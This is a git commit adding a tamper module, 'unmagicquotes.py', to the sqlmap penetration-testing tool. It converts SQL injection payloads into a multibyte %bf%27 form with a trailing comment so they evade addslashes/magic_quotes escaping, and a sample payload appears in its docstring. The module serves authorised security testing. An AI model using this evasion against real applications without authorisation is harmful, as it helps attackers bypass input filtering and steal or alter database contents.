new tampering script

2024-11-22 09:36:35 +03:00 · 2011-08-29 15:42:01 +00:00 · 2011-08-29 15:42:01 +00:00 · 793f1d7774
commit 793f1d7774
parent 08e0eb9b61
1 changed files with 56 additions and 0 deletions
--- a/tamper/unmagicquotes.py
+++ b/tamper/unmagicquotes.py
@ -0,0 +1,56 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+import os
+import random
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.NORMAL
+
+def dependencies():
+    pass
+
+def tamper(payload):
+    """
+    Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)
+
+    Example:
+        * Input: 1' AND 1=1
+        * Output: 1%bf%27 AND 1=1--%20
+
+    Notes:
+        * Useful for bypassing magic_quotes/addslashes feature
+
+    Reference:
+        * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
+    """
+
+    retVal = payload
+
+    if payload:
+        found = False
+        retVal = ""
+
+        for i in xrange(len(payload)):
+            if payload[i] == '\'' and not found:
+                retVal += "%bf%27"
+                found = True
+            else:
+                retVal += payload[i]
+                continue
+
+        if found:
+            retVal = re.sub("\s*(AND|OR)[\s(]+'[^']+'\s*(=|LIKE)\s*'.*", "", retVal)
+            retVal += "-- "
+
+    return retVal